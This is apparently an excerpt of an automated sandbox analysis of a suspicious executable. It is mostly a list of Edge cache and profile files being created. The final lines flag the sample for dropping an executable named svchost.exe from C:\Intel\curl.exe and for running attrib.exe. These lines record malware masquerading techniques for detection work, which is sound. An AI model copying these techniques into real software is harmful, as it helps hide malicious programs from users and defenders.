    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\57e38f4d6de24451_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\57e38f4d6de24451_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\6389b23f4bc62c06_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\6389b23f4bc62c06_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\23a857e3f0a12e9b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\23a857e3f0a12e9b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\819f3848762bde15_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\819f3848762bde15_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b2ea075a80b7dff9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b2ea075a80b7dff9_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\773ec66002a68baf_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\773ec66002a68baf_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3d49f14d5d581ae5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3d49f14d5d581ae5_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4c7155fdcb357b2c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4c7155fdcb357b2c_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0b596ddd81a3e04f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0b596ddd81a3e04f_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ce9a2becd154cc0b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ce9a2becd154cc0b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0e1587ceb49a87ad_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0e1587ceb49a87ad_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4086ead4c1270361_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\4086ead4c1270361_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\41ac4588896d4c6f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\41ac4588896d4c6f_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\a0aa60a133aba17b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\a0aa60a133aba17b_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2733b1fa30133dc5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2733b1fa30133dc5_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\1e07c40510c25b09_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\1e07c40510c25b09_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0804dd4bedc4044a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0804dd4bedc4044a_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\008aecfeca5856cb_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\008aecfeca5856cb_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\62741acbd610245a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\62741acbd610245a_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\05299b87d8a10088_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\05299b87d8a10088_1
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\f0ce427b28da7d25_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\34d467f947acad13_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\aae27d8c-0c0e-4371-928a-b2d2faa2a2fa.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Local State~RF1fb82d.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\872b7b4f8bfb485b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\f7a02825bf690a95_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\65f701fc2d3b6d77_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\6c9220cc-d203-41ca-ad88-6712ed1838ea.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF1fbdea.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\960aaafa77fbb8a0_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\b851f156-c129-4d54-982c-e18bbd14889f.tmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF1fbe86.TMP
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b849a2f19789767a_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\67f1189172319be9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\e6504c209cb882d7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\df9f3044c9ae2e2e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\3055e34b33d94a7f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ea6f02895a4e3500_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\7c4863577c43b32f_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\574b540795aeca12_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\9edf5f432f2b01a8_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2a15b98971354678_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\0a67355f432340b9_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b9dcc9f4c807eeaa_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\321e64ecacb66619_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\153bba9a429a2c40_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2e08a9c6ec333021_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\39c763e560200cda_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\6dcb70bdb8fe40a3_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\7ed93a10144ac834_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\264b46d61d915def_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b7cd751a99c70c48_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\13e83bd1c1ab1541_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\8fdcb7992c9e741c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ff5222d57552b6c1_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\b87cf2f2b0511c4c_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\dd1d9f7425e5aefb_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\348aae4f13c8f553_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\8cce886514f2b2ec_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\217bbc87393d2e57_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\8bfc77f05f6a3cc5_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2a99e21c738e2a0b_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\d6af3918ca46ca94_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\85f220494be669b7_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOCK
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\MANIFEST-000001
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000001.dbtmp
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\2bb582fd7577f97e_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\9f97c8dd99a7773d_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\ed344a77138c223d_0
    Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\CacheStorage\3cedfb74d44f2e84198d23075aef16c34a668ceb\9a53e156-d00a-4dee-bb27-ecac3bc8e2da\95fcbb4ef0998598_0
    Drops PE files with benign system names
    Source: C:\Intel\curl.exeFile created: C:\Intel\svchost.exeJump to dropped file
    Uses cmd line tools excessively to alter registry or file data
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: attrib.exe
    Source: C:\Users\user\Desktop\Yv24LkKBY6.exeProcess created: attrib.exeJump to behavior
